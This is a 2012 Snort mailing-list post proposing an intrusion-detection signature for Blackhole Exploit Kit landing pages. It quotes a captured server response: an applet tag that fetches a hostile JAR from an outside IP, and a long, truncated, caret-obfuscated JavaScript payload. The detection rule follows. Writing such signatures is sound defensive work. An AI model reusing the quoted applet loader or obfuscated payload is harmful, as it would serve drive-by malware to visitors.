Snort mailing list archives
Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet
From: Community Proposed <lists () packetmail net>
Date: Tue, 21 Feb 2012 13:16:17 -0600
12:08:49.734573 IP 65.75.137.95.80 > a.b.c.d.3586: . 1:1461(1460) ack 567 win 6792 HTTP/1.1 200 OK Date: Tue, 21 Feb 2012 19:30:23 GMT Server: nginx/0.7.65 Content-Type: text/html X-Powered-By: PHP/5.3.2 Connection: close Transfer-Encoding: chunked 4ef <html><body><applet code='Photo.class' archive='http://65.75.137.95/content/jav.jar'><param value="vssMlgg=9Po9Pd%oP/9gOFU6gYPMvM-Vcd=G6cr" name="p"/></applet><div style="display:none;"><p>@wpg9p@^p^@pg^p@9pgwp^4p4p^^p^2pg3p^4p@9p-2p-3pzwp@^p@9pgwp^4p@9p^2p20pzwpg2p^p20p3wpggp@9p@@p^3p@9p-z0p^^p@@pg3p^4p-z0p^0p@@pgzp@9p-z0pg3p^3p-z0pggpg9p@@p@wpg3pgwpgzp4p4p4pzwp@pg2p^p20pzwp@p@^p@9pgwp^4p@9p^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^4pg3pg9pgwp-z0p@9pgwp@wp@3p^2p@9p@wpg3p^2p@9p@^p^4p-2p-zpwzpw3p^gp@@p^2p-z0p^0p@wpg0p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zp2pg0pggp@@p^3pg2p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zpz^p^4p^2p^9pwzp^gp@@p^2p-z0p3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4pz9pwzp^gp@9p^2p^3pg3pg9pgwpzgp-wpgp4pz3p4pz2p-wp2pgwp@@pg^p@9pzgp-wp3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4p-wp2pg2p@@pgwp@wpggp@9p^2pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@^p2p@gp2p@@p-zpwzp^2p@9p^4p^@p^2pgwp-z0pg0p^@pgwp@^p^4pg3pg9pgwp-2p-zpwzp@^p-2p@gp2p@@p-zpw3pw3p2pg3p^3p2gp@9pg0pg3pgwp@9p@wpzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-z0p^4p^9p^0p@9pg9pg0p-z0p@gp-9pz9p-wp^@pgwp@wp@9pg0pg3pgwp@9p@wp-wpw3p2pg3p^3p23p^2p^2p@@p^9pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-2p @p@@p^2p^2p@@p^9p@pg3p-zp4p^4p@9p^3p^4p-2p3^p@gpg4p@9p@^p^4p4p^0p^2pg9p^4pg9p^4p^9p^0p@9p4p^4pg9 333 alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet"; flow:established,from_server; content:"<html><body><applet|20|"; fast_pattern; content:"|20|code="; distance:0; content:"|20|archive="; distance:0; content:"|3a|none|3b|"; distance:0; nocase; pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi"; classtype:trojan-activity; reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; sid:x; rev:1;) Thanks, Nathan ------------------------------------------------------------------------------ Keep Your Developer Skills Current with LearnDevNow! The most comprehensive online learning library for Microsoft developers is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, Metro Style Apps, more. Free future releases when you subscribe now! http://p.sf.net/sfu/learndevnow-d2d _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet Community Proposed (Feb 21)